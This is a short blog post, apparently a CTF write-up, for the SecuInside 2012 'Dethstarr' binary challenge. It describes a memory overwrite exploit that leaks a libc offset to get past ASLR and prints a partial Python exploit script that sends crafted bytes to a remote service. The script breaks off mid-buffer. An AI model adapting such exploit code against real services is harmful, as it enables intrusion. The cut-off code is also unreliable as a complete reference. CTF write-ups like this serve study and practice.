codezen.fr code hacking, zen coding

12Sep/12Off

SecuInside 2012 – Dethstarr binary Write-up

Posted by aXs

Quick solution post for this challenge for future reference

This a memory overwrite exploit, it's a bit convoluted because ASLR was enabled and so we need to do an infoleak to get the right offset inside libc.

#!/usr/bin/env python

import socket
import sys
import time
import struct

if len(sys.argv) != 3:
  print '\nUsage:\t./dethhstar.py [host] [port]'
  sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)                         # Creating Socket
s.connect((host, port))                                                       # Connecting to socket

out = open("buf.bin","wb")

handshake = s.recv(72)
print 'Received', repr(handshake)

#      cmp     eax, 0CAh |  test    eax, eax  [     cmp eax, 1     | cmp [ebp+arg_0], 0ACh | cmp [ebp+arg_4], 9Ah |  imul/cmp  eax, 4Eh/jle |
buf = '\xCA\x00\x00\x00' + '\x00\x00\x00\x00' + '\x01\x00\x00\x00' + '\xAC\x00\x00\x00'    +  '\x9A\x00\x00\x00'  + '\x01\x00\x00\x00'  

#            cmp [ebp+var_8], 0|cmp [ebp+var_C], 0|cmp [ebp+var_10], 1|cmp [ebp+var_14], 1
buf = buf + '\x00\x00' + '\x00\x00' + '\x01\x00' + '